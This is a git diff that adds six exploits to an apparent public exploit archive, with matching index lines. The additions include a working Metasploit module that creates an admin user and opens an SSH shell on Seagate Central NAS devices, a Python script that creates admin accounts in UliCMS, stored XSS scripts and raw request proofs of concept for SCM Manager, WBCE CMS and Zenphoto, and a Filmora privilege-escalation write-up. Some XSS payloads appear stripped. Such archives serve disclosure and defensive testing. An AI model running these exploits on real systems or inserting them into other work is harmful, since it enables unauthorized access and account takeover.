diff --git a/exploits/hardware/remote/51487.rb b/exploits/hardware/remote/51487.rb new file mode 100755 index 000000000..951d46cfb --- /dev/null +++ b/exploits/hardware/remote/51487.rb @@ -0,0 +1,218 @@ +## +# Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit) +# Date: Dec 9 2019 +# Exploit Author: Ege Balci +# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/ +# Version: 2015.0916 +# CVE : 2020-6627 + +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/http' +require 'net/ssh' +require 'net/ssh/command_stream' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::SSH + + def initialize(info={}) + super(update_info(info, + 'Name' => "Seagate Central External NAS Arbitrary User Creation", + 'Description' => %q{ + This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. + Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state + and register a new admin user which is capable of SSH access. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ege Balcı ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'], + ['CVE', '2020-6627'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'WfsDelay' => 5, + }, + 'Platform' => ['unix'], + 'Arch' => [ARCH_CMD], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find' + } + }, + 'Targets' => + [ + ['Auto', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + } + ], + ], + 'Privileged' => true, + 'DisclosureDate' => "Dec 9 2019", + 'DefaultTarget' => 0 + )) + + + register_options( + [ + OptString.new('USER', [ true, 'Seagate Central SSH user', '']), + OptString.new('PASS', [ true, 'Seagate Central SSH user password', '']) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"), + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + } + },60) + + if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916') + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + + # First get current state + first_state=get_state() + if first_state + print_status("Current device state: #{first_state['state']}") + else + return + end + + if first_state['state'] != 'start' + # Set new start state + first_state['state'] = 'start' + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'), + 'ctype' => 'application/x-www-form-urlencoded', + 'data' => "info=#{first_state.to_json}" + },60) + + changed_state=get_state() + if changed_state && changed_state['state'] == 'start' + print_good("State successfully changed !") + else + print_error("Could not change device state") + return + end + end + + name = Rex::Text.rand_name_male + user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}" + pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8) + + print_status('Creating new admin user...') + print_status("User: #{user}") + print_status("Pass: #{pass}") + + # Add new admin user + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"), + 'ctype' => 'application/x-www-form-urlencoded', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1} + },60) + + + conn = do_login(user,pass) + if conn + print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})") + handler(conn.lsock) + end + + end + + + + def do_login(user, pass) + factory = ssh_socket_factory + opts = { + :auth_methods => ['password', 'keyboard-interactive'], + :port => 22, + :use_agent => false, + :config => false, + :password => pass, + :proxy => factory, + :non_interactive => true, + :verify_host_key => :never + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(rhost, user, opts) + end + rescue Rex::ConnectionError + fail_with Failure::Unreachable, 'Connection failed' + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + conn = Net::SSH::CommandStream.new(ssh) + ssh = nil + return conn + end + + return nil + end + + def get_state + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"), + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + } + },60) + + if res && (res.code == 200 ||res.code == 100) + return res.get_json_document + end + res = nil + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/51488.py b/exploits/multiple/webapps/51488.py new file mode 100755 index 000000000..b670c899d --- /dev/null +++ b/exploits/multiple/webapps/51488.py @@ -0,0 +1,91 @@ +#!/usr/bin/python3 + +# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated) +# Google Dork: intitle:"SCM Manager" intext:1.60 +# Date: 05-25-2023 +# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829) +# Vendor Homepage: https://scm-manager.org/ +# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/ +# Version: 1.2 <= 1.60 +# Tested on: Debian based +# CVE: CVE-2023-33829 + +# Modules +import requests +import argparse +import sys + +# Main menu +parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit') +parser.add_argument("-u", "--user", help="Admin user or user with write permissions") +parser.add_argument("-p", "--password", help="password of the user") +args = parser.parse_args() + + +# Credentials +user = sys.argv[2] +password = sys.argv[4] + + +# Global Variables +main_url = "http://localhost:8080/scm" # Change URL if its necessary +auth_url = main_url + "/api/rest/authentication/login.json" +users = main_url + "/api/rest/users.json" +groups = main_url + "/api/rest/groups.json" +repos = main_url + "/api/rest/repositories.json" + +# Create a session +session = requests.Session() + +# Credentials to send +post_data={ + 'username': user, # change if you have any other user with write permissions + 'password': password # change if you have any other user with write permissions +} + +r = session.post(auth_url, data=post_data) + +if r.status_code == 200: + print("[+] Authentication successfully") +else: + print("[-] Failed to authenticate") + sys.exit(1) + +new_user={ + + "name": "newUser", + "displayName": "", + "mail": "", + "password": "", + "admin": False, + "active": True, + "type": "xml" + +} + +create_user = session.post(users, json=new_user) +print("[+] User with XSS Payload created") + +new_group={ + + "name": "newGroup", + "description": "", + "type": "xml" + +} + +create_group = session.post(groups, json=new_group) +print("[+] Group with XSS Payload created") + +new_repo={ + + "name": "newRepo", + "type": "svn", + "contact": "", + "description": "", + "public": False + +} + +create_repo = session.post(repos, json=new_repo) +print("[+] Repository with XSS Payload created") \ No newline at end of file diff --git a/exploits/php/webapps/51484.txt b/exploits/php/webapps/51484.txt new file mode 100644 index 000000000..56bd0918f --- /dev/null +++ b/exploits/php/webapps/51484.txt @@ -0,0 +1,125 @@ +Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS) +Version: 1.6.1 +Bugs: XSS +Technology: PHP +Vendor URL: https://wbce-cms.org/ +Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 +Date of found: 03-05-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +###XSS-1### +steps: + +1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/) +2. upload malicious svg file + +svg file content ===> + + + + + + + + + + +poc request: + +POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1 +Host: localhost +Content-Length: 976 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-platform: "Linux" +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO +Accept: */* +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167 +Connection: close + +------WebKitFormBoundary5u4r3pOGl4EnuBtO +Content-Disposition: form-data; name="reqid" + +187de34ea92ac +------WebKitFormBoundary5u4r3pOGl4EnuBtO +Content-Disposition: form-data; name="cmd" + +upload +------WebKitFormBoundary5u4r3pOGl4EnuBtO +Content-Disposition: form-data; name="target" + +l1_Lw +------WebKitFormBoundary5u4r3pOGl4EnuBtO +Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg" +Content-Type: image/svg+xml + + + + + + + + +------WebKitFormBoundary5u4r3pOGl4EnuBtO +Content-Disposition: form-data; name="mtime[]" + +1683056102 +------WebKitFormBoundary5u4r3pOGl4EnuBtO-- + + +3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg) + + + +======================================================================================================================== + +###XSS-2### + +1. go to pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages) +2. add page +3. write page source content (%3Cscript%3Ealert%284%29%3C%2Fscript%3E) +payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E +poc request: + +POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1 +Host: localhost +Content-Length: 143 +Cache-Control: max-age=0 +sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Linux" +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475 +Connection: close + +page_id=4§ion_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save + + +4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php \ No newline at end of file diff --git a/exploits/php/webapps/51485.txt b/exploits/php/webapps/51485.txt new file mode 100644 index 000000000..58c10a447 --- /dev/null +++ b/exploits/php/webapps/51485.txt @@ -0,0 +1,28 @@ +Exploit Title: Zenphoto 1.6 - Multiple stored XSS +Application: Zenphoto-1.6 xss poc +Version: 1.6 +Bugs: XSS +Technology: PHP +Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/ +Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip +Date of found: 01-05-2023 +Author: Mirabbas Ağalarov +Tested on: Linux + + +2. Technical Details & POC +======================================== +###XSS-1### +steps: +1. create new album +2. write Album Description : +3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/ + +===================================================== +###XSS-2### +steps: +1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users) +2.change postal code as +3.if admin user information import as html , xss will trigger + +poc video : https://youtu.be/JKdC980ZbLY \ No newline at end of file diff --git a/exploits/php/webapps/51486.txt b/exploits/php/webapps/51486.txt new file mode 100644 index 000000000..8b707f805 --- /dev/null +++ b/exploits/php/webapps/51486.txt @@ -0,0 +1,35 @@ +#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment +#Application: Ulicms +#Version: 2023.1-sniffing-vicuna +#Bugs: create admin user via mass assignment +#Technology: PHP +#Vendor URL: https://en.ulicms.de/ +#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip +#Date of found: 04-05-2023 +#Author: Mirabbas Ağalarov +#Tested on: Linux + +##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna + +import requests + +new_name=input("name: ") +new_email=input("email: ") +new_pass=input("password: ") + +url = "http://localhost/dist/admin/index.php" + +headers = {"Content-Type": "application/x-www-form-urlencoded"} + +data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language=" + +response = requests.post(url, headers=headers, data=data) + +if response.status_code == 200: + print("Request is success and created new admin account") + +else: + print("Request is failure.!!") + + +#POC video : https://youtu.be/SCkRJzJ0FVk \ No newline at end of file diff --git a/exploits/windows/local/51483.txt b/exploits/windows/local/51483.txt new file mode 100644 index 000000000..178ae95d9 --- /dev/null +++ b/exploits/windows/local/51483.txt @@ -0,0 +1,51 @@ +# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation +# Date: 20 May 2023 +# Exploit Author: Thurein Soe +# Vendor Homepage: https://filmora.wondershare.com +# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE +# Version: Filmora 12 ( Build 1.0.0.7) +# Tested on: Windows 10 (Version 10.0.19045.2965) +# CVE : CVE-2023-31747 + + +Vulnerability description: +Filmora is a professional video editing software. Wondershare NativePush +Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare +NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The +service name "NativePushService" was vulnerable to unquoted service paths +vulnerability which led to full local privilege escalation in the affected +window operating system as the service "NativePushService" was running with +system privilege that the local user has write access to the directory +where the service is located. Effectively, the local user is able to +elevate to local admin upon successfully replacing the affected executable. + + +C:\sc qc NativePushService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: NativePushService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : +C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare +NativePush\WsNativePushService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Wondershare Native Push Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare +NativePush\WsNativePushService.exe" + +C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare +NativePush\WsNativePushService.exe + +BUILTIN\Users:(ID)F + + NT AUTHORITY\SYSTEM:(ID)F + + BUILTIN\Administrators:(ID)F + + HNINKAYTHAYAR\HninKayThayar:(ID)F \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e3801d5e7..e5e225116 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3869,6 +3869,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51460,exploits/hardware/remote/51460.txt,"Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,, 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,, 37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,, +51487,exploits/hardware/remote/51487.rb,"Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)",2023-05-25,"Ege Balci",remote,hardware,,2023-05-25,2023-05-25,0,CVE-2020-6627,,,,, 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548 50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",2022-03-11,"Aryan Chehreghani",remote,hardware,,2022-03-11,2022-03-11,0,CVE-2020-17456,,,,, 26412,exploits/hardware/remote/26412.pl,"Seowonintech Devices - Remote Command Execution",2013-06-24,"Todor Donev",remote,hardware,,2013-06-24,2016-12-04,0,OSVDB-94550,,,,, @@ -12085,6 +12086,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Emircan Baş",webapps,multiple,,2021-05-06,2021-05-07,0,,,,,http://www.exploit-db.comschlix-cms-v2.2.6-6.zip, 49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)",2021-05-24,"Emir Polat",webapps,multiple,,2021-05-24,2021-10-29,0,,,,,http://www.exploit-db.comschlix-cms-v2.2.6-6.zip, 49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple,,2021-05-06,2021-05-06,0,,,,,http://www.exploit-db.comschlix-cms-v2.2.6-6.zip, +51488,exploits/multiple/webapps/51488.py,"SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)",2023-05-25,neg0x,webapps,multiple,,2023-05-25,2023-05-25,0,CVE-2023-33829,,,,, 50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Remote Code Execution",2021-07-02,"Stig Magnus Baugstø",webapps,multiple,,2021-07-02,2021-10-29,0,CVE-2020-7750,,,,, 18750,exploits/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",webapps,multiple,,2012-04-19,2012-07-28,1,OSVDB-81122;OSVDB-81121;OSVDB-81120;OSVDB-81119;OSVDB-81118;OSVDB-81117;CVE-2012-1261;CVE-2012-1260;CVE-2012-1259;CVE-2012-1258,,,,,https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt 49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,, @@ -31078,6 +31080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46977,exploits/php/webapps/46977.txt,"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting",2019-06-10,Unk9vvN,webapps,php,80,2019-06-10,2019-06-10,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comulicms-2019.1-spitting-lama-full.zip, 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80,2019-04-22,2019-04-22,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,, 48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,,2020-03-24,2020-05-11,0,CVE-2020-12704,,,,, +51486,exploits/php/webapps/51486.txt,"Ulicms 2023.1 - create admin user via mass assignment",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,0,,,,,, 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip, 51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,, 51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-09,1,,,,,, @@ -31816,6 +31819,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,, 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,, 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,, +51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,, 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,, 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,, 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,, @@ -34340,6 +34344,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39571,exploits/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",webapps,php,80,2016-03-17,2016-03-17,1,,,,,http://www.exploit-db.comzenphoto-zenphoto-1.4.11.tar.gz, 22524,exploits/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,webapps,php,,2012-11-06,2012-11-06,1,OSVDB-87033;OSVDB-87032;OSVDB-87031;OSVDB-87030;OSVDB-87029;OSVDB-87028;OSVDB-87027;OSVDB-87026;OSVDB-87025;OSVDB-87024;OSVDB-87023;OSVDB-87022;OSVDB-87021;OSVDB-87020;OSVDB-87019;OSVDB-87018;OSVDB-87017;OSVDB-87016;OSVDB-87015,,,,http://www.exploit-db.comzenphoto-1.4.3.3.tar.gz,http://www.waraxe.us/advisory-96.html 37602,exploits/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",webapps,php,80,2015-07-13,2015-07-13,0,CVE-2015-5595;CVE-2015-5594;CVE-2015-5591;OSVDB-124783;OSVDB-124461;OSVDB-124460;OSVDB-124459;OSVDB-124458,,,,http://www.exploit-db.comzenphoto-zenphoto-1.4.8.tar.gz, +51485,exploits/php/webapps/51485.txt,"Zenphoto 1.6 - Multiple stored XSS",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,, 14359,exploits/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,webapps,php,,2010-07-14,2010-07-14,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14359.png,http://www.exploit-db.comzenphoto-1.3.tar.gz, 9166,exploits/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)",2009-07-16,petros,webapps,php,,2009-07-15,,1,OSVDB-55922;CVE-2009-4563;OSVDB-55921;CVE-2009-4562,,,,, 48633,exploits/php/webapps/48633.py,"ZenTao Pro 8.8.2 - Command Injection",2020-07-02,"Daniel Monzón",webapps,php,,2020-07-02,2020-07-02,0,,,,,, @@ -39812,6 +39817,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,local,windows,,2005-04-27,,1,OSVDB-14685;CVE-2005-1414,,,,, 51267,exploits/windows/local/51267.txt,"FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking",2023-04-06,"Bilal Qureshi",local,windows,,2023-04-06,2023-04-06,0,,,,,, 39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows,,2016-05-11,2016-05-11,0,,,,,http://www.exploit-db.comFileZilla_3.17.0_win64-setup.exe, +51483,exploits/windows/local/51483.txt,"Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation",2023-05-25,"Thurein Soe",local,windows,,2023-05-25,2023-05-25,0,CVE-2023-31747,,,,, 18184,exploits/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",local,windows,,2011-12-01,2011-12-01,0,CVE-2011-5002;OSVDB-77454,"Metasploit Framework (MSF)",,,,http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf 41709,exploits/windows/local/41709.rb,"Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit)",2013-01-31,Metasploit,local,windows,,2017-03-23,2017-03-23,1,CVE-2013-2492;OSVDB-91044,,,,,https://github.com/rapid7/metasploit-framework/blob/b08d1ad8d8d6c0f5cb63cc44e3ff75efb9edb7b3/modules/exploits/windows/misc/fb_cnct_group.rb 919,exploits/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure",2005-04-07,Kozan,local,windows,,2005-04-06,,1,OSVDB-15325,,,,,